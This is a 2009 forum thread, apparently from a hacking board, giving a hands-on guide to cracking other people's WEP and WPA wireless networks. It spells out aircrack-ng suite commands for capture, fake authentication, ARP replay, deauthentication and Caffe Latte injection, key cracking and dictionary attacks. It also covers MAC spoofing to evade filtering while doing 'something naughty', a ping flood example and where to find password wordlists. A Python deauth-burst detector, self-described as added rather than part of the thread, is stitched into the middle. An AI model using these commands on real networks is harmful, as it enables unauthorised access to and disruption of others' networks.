How to hack wireless networks, and what to do with them

#1, 10-27-2009, 06:07 AM
Syphilis (Junior Member)
Join Date: Oct 2009
Location: Inside your girlfriend
Posts: 26

Originally posted here:
https://www.zoklet.net/bbs/showthread.php?t=64197
*I haven't copied all the content over to this post, just the main stuff. Yes, I'm lazy.* ^^ Follow the link for the full version.


------------------------------------------------

How to crack wireless networks, and what to do once you've connected to them.

This is all from personal experience cracking wireless with Linux (specifically Backtrack) and OS X.

If you have linux or OS X, you'll need to install the right software and you'll be ready to go. If you have Windows, download a linux distro (the Backtrack live CD is good and includes everything you need.)

There may be better ways to do some of these things. Feel free to correct me.

I'm just going to give an overview, I'm not giving you exact instructions on how to install software, because in most cases it's fairly simple and you can find instructions on the software's website. You'll need to know basically how to use a linux command line.

What you need
-A laptop. Desktops work too, but you can move laptops around.
-Wireless card. Most will work to varying degrees; the best wireless chip is Ralink's RT73. The D-Link DWL G122 is a USB wireless card which uses this chip. There are others too.
-Operating system: OS X works well (10.5 and later), linux works well (get the Backtrack live CD if you don't have it), Windows is not so good (so get Linux/Backtrack.)

How to get help
Before I go on, if you need help:
-Google the problem. Google any error messages you get.
-Read about how the program works. Check its homepage and wikipedia entry.
-Read the manual entry for the software. On UNIX-based systems (including OS X and Linux), you type:
Code:
man program_name
That brings up the manual entry for that program and a list of most of its commands. Use the arrow keys to scroll up and down (duh.)
Example for a program named Hydra:
Code:
man hydra
If you get a "permissions error" when executing a command, add "sudo" before the command. This will run the command as the root user.

Basics
There are 2 steps to cracking wireless.
1. Gather data packets from network.
2. Use gathered packets to crack the password.

You can use packet injection techniques to speed up packet capture.

Packet capture with Kismet
Kismet is my favourite for this. It works well with most wireless cards and requires minimal setup.
To set it up, go to the folder at /usr/local/etc and open the kismet.conf file. You'll need to find the "source" line (it should be within the first 20 lines) and replace the three comma separated values with whatever your wireless card is. The default is something like this:
Code:
source=none,addme,none
Example of a correctly set up RT73 wireless card on linux:
Code:
source=rt73,rausb0,ralink_wireless
For a built in card on OS X:
Code:
source=darwin,en1,airport_extreme
The final value (card name) doesn't matter, just make up whatever.
Kismet works fine on linux and OS X, although it won't work with USB cards under OS X at the moment.

Airodump-ng is another great program which requires no special configuration to run. It's included with Aircrack and is linux only.
My guide on Airodump-ng:
Zoklet.net - View Single Post - Archived: How to hack wireless networks, and what to do with them

Password cracking
Aircrack-ng is the best. It runs on linux and OS X.
The standard command is:
Code:
aircrack-ng your_packet_capture_file.dump
Hit return, Aircrack will read the packets, and ask you which network you want to crack.

Packet injection
Aireplay-ng runs on Linux and is what you want. It's included with Aircrack. Not required for cracking, but it can speed things up.
3 usual kinds of injection:
-ARP Replay replays ARP packets on WEP networks. It can generate huge amounts of traffic quickly.
-Fake authentication. You need to perform this before performing an ARP replay attack so the AP won't reject your packets.
-Deauthentication. Deauth attacks are used on WPA/WPA2 networks to disconnect clients from the access point, forcing them to automatically reconnect. This gives you a chance to capture the 4 way handshake which can be attacked by brute force.

-Caffe Latte attack. Used to attack WEP networks when there are clients in range who are connected to the target network, but the target access point itself is not in range.

-Test injection. Simply used to test the responsiveness of a specific access point to packet injection.

KisMAC is an OS X only program which combines sniffing, cracking, and injection. It's a very easy to use GUI program but can be a bit unstable and iffy at times. I use it sometimes because it supports injection with RT73 USB wireless cards.

MAC Spoofing
MAC = Media Access Control. It's basically a serial number on every wireless device. You can spoof it, which is what you should do when connecting to a network you've cracked or plan to do something naughty on.
A MAC address is in the format XX:XX:XX:XX:XX:XX where the X's are numbers between 0-9 or letters between A-F.
On linux you usually need to take the interface down before spoofing.
Code:
ifconfig wlan0 up
ifconfig wlan0 down
One spoofing command is:
Code:
ifconfig wlan0 hw ether XX:XX:XX:XX:XX:XX
Where wlan0 = whatever the interface name is. To list interfaces:
Code:
ifconfig
To list detail on a specific interface only:
Code:
ifconfig wlan0
Where wlan0 is the interface name.
On OS X the interface needs to be up to be spoofed. This command usually works:
Code:
sudo ifconfig en1 ether XX:XX:XX:XX:XX:XX
Basic command format
Example:
Code:
ping -f -c 1000 192.168.1.1
ping = the name of the command or program to use (ping in this example.)
-f = an option requiring no further action (flood in this example.)
-c 1000 = the -c is another option (amount of pings to send), 1000 is user input for the previous option to act on (will send 1000 pings in this case)
192.168.1.1 = what the program acts on, in this case an IP address.

So basically:
command > options (see man page to view them and the correct syntax) > target/file/whatever

Cracking WEP
To crack WEP you need initialisation vectors (IVs.) You get these by waiting around capturing data from networks.

By default, software like Kismet "channel hops" which means it jumps from wireless channel to channel to pick up all the networks possible. Lock it to a specific channel to capture on a specific channel much quicker.

You usually need 50,000 to 150,000 IVs to crack a WEP network (sometimes up to a million.) This can take between minutes and days, depending on the amount of traffic and if you use successful packet injection. The actual cracking (with Aircrack) usually takes a matter of seconds.

Doesn't matter how strong the password is, since WEP itself is flawed.

Brute forcing WPA/WPA2
Here you need to capture the 4 way handshake performed when a client connects to the access point. All you need is one of them, all other data is useless. Deauthentication attacks are good for forcing clients to re-perform the handshake.

You use a dictionary attack against the WPA handshake (Aircrack does this.) Get yourself a good word list with common passwords and variations.

Bypassing MAC filtering
MAC address filtering is sometimes used to allow only validated clients to connect. To bypass this, you need to spoof your MAC address and make it match the MAC address of a client already connected to the network. You can view connected clients in Kismet, Airodump, and KisMAC.

SSID cloaking
Hidden access point names are automatically revealed by Kismet & co (since they passively monitor the network.)

#2, 10-27-2009, 06:09 AM
Syphilis (Junior Member)
Join Date: Oct 2009
Location: Inside your girlfriend
Posts: 26

Fake authentication
You will probably need to do this before you do an ARP replay attack against a WEP network.

You will need to be running a packet sniffer in passive mode locked to the channel of the network you want to fake authentication with.

Code:
aireplay-ng -1 z -a xx -h yy [iface]
z = re-association timing. Start with 0 (zero).
xx = MAC address of target network.
yy = your card MAC address.
[iface] = interface of your wireless card (e.g. wlan0).

You can also try the -D switch if you're having trouble faking authentication with an access point.
Example:
Code:
aireplay-ng -1 z -D -a xx -h yy [iface]
Specific Aireplay-ng commands for packet injection

------------------------

Fake Authentication
aireplay-ng -1 [re-association timing] -e [target ESSID] -a [target AP MAC] -x [injection speed] -h [your MAC] [interface]

ARP Replay
aireplay-ng -3 -b [target AP MAC] -h [your MAC] [interface]
you can also use -e to specify the ESSID if you want:
aireplay-ng -3 -e [target AP ESSID] -b [target AP MAC] -h [your MAC] [interface]

Deauthentication
aireplay-ng -0 [# of deauths to send] -a [target AP MAC] -h [your MAC] [interface]
or you can deauthenticate a specific client connected to the network:
aireplay-ng -0 [# of deauths to send] -a [target AP MAC] -c [client MAC] -h [your MAC] [interface]

Caffe Latte
aireplay-ng -6 -e [target AP ESSID] -a [target AP MAC] -c [client MAC] -h [your MAC] [interface]

Key:
interface = interface name of your wireless card, e.g. wlan0
your MAC = MAC address of your wireless card doing the injection
target MAC = MAC address of the target wireless access point
client MAC = MAC address of a client connected to the network
injection speed = in packets per second. Default is 500, max is 1024
ESSID = name of the network
# of deauths = start with ~10
re-association timing = 0. Try 6000 if it fails after a few minutes

------------------------

Examples:
My interface is wlan1
My card's MAC is 00:11:22:33:44:55
The target access point's MAC is aa:bb:cc:dd:ee:ff
The MAC of a connected client is 77:88:99:77:88:99
The ESSID (name) of the target network is "mynetwork"

Fake authentication
aireplay-ng -1 0 -e mynetwork -a aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55 wlan1

ARP Replay
aireplay-ng -3 -b aa:bb:cc:dd:ee:ff -x 1024 -h 00:11:22:33:44:55 wlan1

Deauthentication
aireplay-ng -0 10 -a aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55 wlan1

Caffe Latte
aireplay-ng -6 -e mynetwork -a aa:bb:cc:dd:ee:ff -c 77:88:99:77:88:99 -h 00:11:22:33:44:55 wlan1

How to capture packets with Airodump-ng

Airodump-ng is a packet sniffer used to gather data to crack networks (like Kismet.) To set it up:

First you need to check to see if there are any processes that might interfere with putting your wireless card into passive mode. Run this command:
Code:
airmon-ng check
If there are any running processes or programs that might interfere with Airodump, it should list them. Usually you'll get a couple of DHCP processes. Anything that comes up will be preceded by a number. This number is their process ID. Example:
Code:
4535 dhcpcd
4536 dhcpcd
4700 dhcpcd
If you know your way around linux you should be able to figure out exactly which processes you need to kill, but if you don't know exactly what you're doing, you may as well kill all of them. To do this:
Code:
kill xxxx
where xxxx is the process ID. Repeat this command for each process, then run "airmon-ng check" again to check that the processes are dead. Example:
Code:
kill 4536
Next you put your card into passive mode to capture packets.
Code:
airmon-ng start interface
interface = the name of your card, e.g. wlan1, en1.
Example:
Code:
airmon-ng start wlan1
Next you start Airodump and start capturing packets:
Code:
airodump-ng -w xxx -c yyy interface
xxx = the name of the file to save captured packets to.
yyy = the channel to sniff on.
interface = the interface of the card to sniff on (must be the same card that you just used airmon-ng to enable passive mode on.)
You can either pick a single channel (example: 5), multiple channels (example: 5,7,9), or a range of channels (example: 1-11) to sniff on.
Example to sniff on channel 5 on an interface named wlan1 and save to a file named "savefile":
Code:
airodump-ng -w savefile -c 5 wlan1
Example to sniff on channel 5, 7, and 9 on an interface named wlan1 and save to a file named "savefile":
Code:
airodump-ng -w savefile -c 5,7,9 wlan1
Example to sniff on channels 1-11 on an interface named wlan1 and save to a file named "savefile":
Code:
airodump-ng -w savefile -c 1-11 wlan1
Airodump is not interactive, meaning you'll need to quit it and restart it if you want to change channels. You don't need to go through the whole airmon-ng process again, just run airodump-ng with the different settings.

Control + Q will quit.

If you get permissions errors when executing one of these commands, add "sudo" before the command. You shouldn't need to do this if you are running from a live CD.

How to capture packets with Kismet

I already explained how to set up Kismet's configuration file (kismet.conf) in the first part of this guide. The command to actually start kismet is:
Code:
kismet
Nice and simple. If you get a permissions error (under some Linux installations and Mac OS X) you'll need to use sudo:
Code:
sudo kismet
Kismet is interactive. The arrows on your keyboard will move up and down the list of networks. These are some common commands:
Shift + L = locks sniffing to the channel of the currently selected network.
Shift + H = starts channel hopping from channels 1-11.
Return = details of currently selected network
c = client list
r = a pretty graph
q = return to the main Kismet screen
Shift + Q = quit
m = mutes sound
s = lets you choose how to sort networks

Cracking WEP keys and brute forcing WPA passwords
Using Aircrack-ng. Aircrack uses the latest PTW attack against WEP by default.

WEP
You must capture initialisation vectors (IVs) with your packet sniffer.
For 64 bit WEP you'll need ~40,000 IVs.
For 128 bit WEP you'll need ~90,000 IVs.

Command:
Code:
aircrack-ng [pcap file]
pcap file = the dump file saved by your packet sniffer
Example:
Code:
aircrack-ng dump1.pcap
Aircrack will get to work on your file.

With low amounts of IVs you can try increasing the fudge factor. Basically, when aircrack looks at all the possible combinations of a WEP key, it assigns each hexadecimal byte a "vote" (shown in () brackets next to each hex byte when cracking). Default fudge factor is 2.

Example. Say one byte has 100 votes. 100 divided by the fudge factor (2) is 50. Therefore Aircrack will try combinations of bytes with more than 50 votes. Increasing the fudge factor to 4 will mean 100/4, so Aircrack will try each byte with 25+ votes. A factor of 10 will mean 100/10, so each byte with 10+ votes will be tried.

The fudge factor is set with the -f # option. Example for a factor of 8:
Code:
aircrack-ng -f 8 [pcap file]
WPA/WPA2
You need to capture a 4 way handshake. You can then try a brute force dictionary attack against it. You'll need a good dictionary with default passwords, common passwords, and common variations.

Command:
Code:
aircrack-ng -w [wordlist] [pcap file]
Have fun
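The deauthentication attack described in both posts above (the "Packet injection" section of the first post and the aireplay-ng -0 examples in this one) has a defender's counterpart: a client leaving an access point normally produces a frame or two, while a forced reconnect shows up as a burst of deauth frames. The following is an added example, not code from the thread or from Aircrack/Kismet; it assumes an invented one-frame-per-line text export of management frames and runs over a constructed sample.

```python
"""Flag deauthentication bursts in a constructed 802.11 frame log. Added example, not
code from the thread or from Aircrack/Kismet; assumes an invented one-frame-per-line
export "<epoch seconds> <kind> <src MAC> <dst MAC>" (constructed sample below)."""
import re
from collections import defaultdict

# XX:XX:XX:XX:XX:XX with hex digits, the MAC format the first post describes.
MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}$")

def is_mac(text):
    return bool(MAC_RE.match(text))

def parse_frame(line):
    """Return (timestamp, kind, src, dst) or None for a malformed line."""
    parts = line.split()
    if len(parts) != 4 or not (is_mac(parts[2]) and is_mac(parts[3])):
        return None
    try:
        return float(parts[0]), parts[1].lower(), parts[2].lower(), parts[3].lower()
    except ValueError:
        return None

def deauth_bursts(lines, window=10.0, threshold=5):
    """Map (src, dst) -> peak number of deauth frames inside any `window`-second
    sliding window, keeping only pairs whose peak exceeds `threshold`."""
    times_by_pair = defaultdict(list)
    for line in lines:
        frame = parse_frame(line)  # malformed lines are skipped, not fatal
        if frame and frame[1] == "deauth":
            times_by_pair[(frame[2], frame[3])].append(frame[0])
    flagged = {}
    for pair, times in times_by_pair.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # slide the window's left edge forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[pair] = peak
    return flagged

# Constructed sample: a beacon, a normal two-frame disconnect of one client, a junk
# line, then ten broadcast deauths from the AP's address within two seconds.
SAMPLE_LOG = [
    "1256623620.0 beacon aa:bb:cc:dd:ee:ff ff:ff:ff:ff:ff:ff",
    "1256623621.1 deauth aa:bb:cc:dd:ee:ff 77:88:99:77:88:99",
    "1256623621.2 deauth aa:bb:cc:dd:ee:ff 77:88:99:77:88:99",
    "this line is not a frame",
] + ["%.1f deauth aa:bb:cc:dd:ee:ff ff:ff:ff:ff:ff:ff" % (1256623700 + 0.2 * i)
     for i in range(10)]

if __name__ == "__main__":
    print(deauth_bursts(SAMPLE_LOG))  # {('aa:bb:cc:dd:ee:ff', 'ff:ff:ff:ff:ff:ff'): 10}
```

Only the broadcast burst from the AP's address is flagged; the two-frame client disconnect stays under the threshold, and the junk line is ignored rather than aborting the scan.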

#3, 10-29-2009, 01:54 AM
needzhelp (Member)
Join Date: Aug 2009
Location: United States
Posts: 84

Good post, Syphilis.

I thought I might add a little video... it's not mine. Cracking WPA is challenging, here is the video that helped me learn.

YouTube - Cracking wifi wpa-psk Networks (watch in HD Mode)

Do you know where I could get a good dictionary?
I experimented with my home network, easy pass-phrase and a sucky dictionary.

#4, 10-29-2009, 10:30 AM
Syphilis (Junior Member)
Join Date: Oct 2009
Location: Inside your girlfriend
Posts: 26

Quote:
Originally Posted by needzhelp
Good post, Syphilis.
Thanks.

Quote:
Do you know where I could get a good dictionary?
I experimented with my home network, easy pass-phrase and a sucky dictionary.
Bittorrent sites have usually got a few wordlists on them, the biggest are ~800MB.

The 41MB Openwall wordlist is the best one I've found. It's got default passes, common passes, names, and some variations. Again, you should be able to find a copy on torrent sites.
Tags
wep, wireless hacking, wpa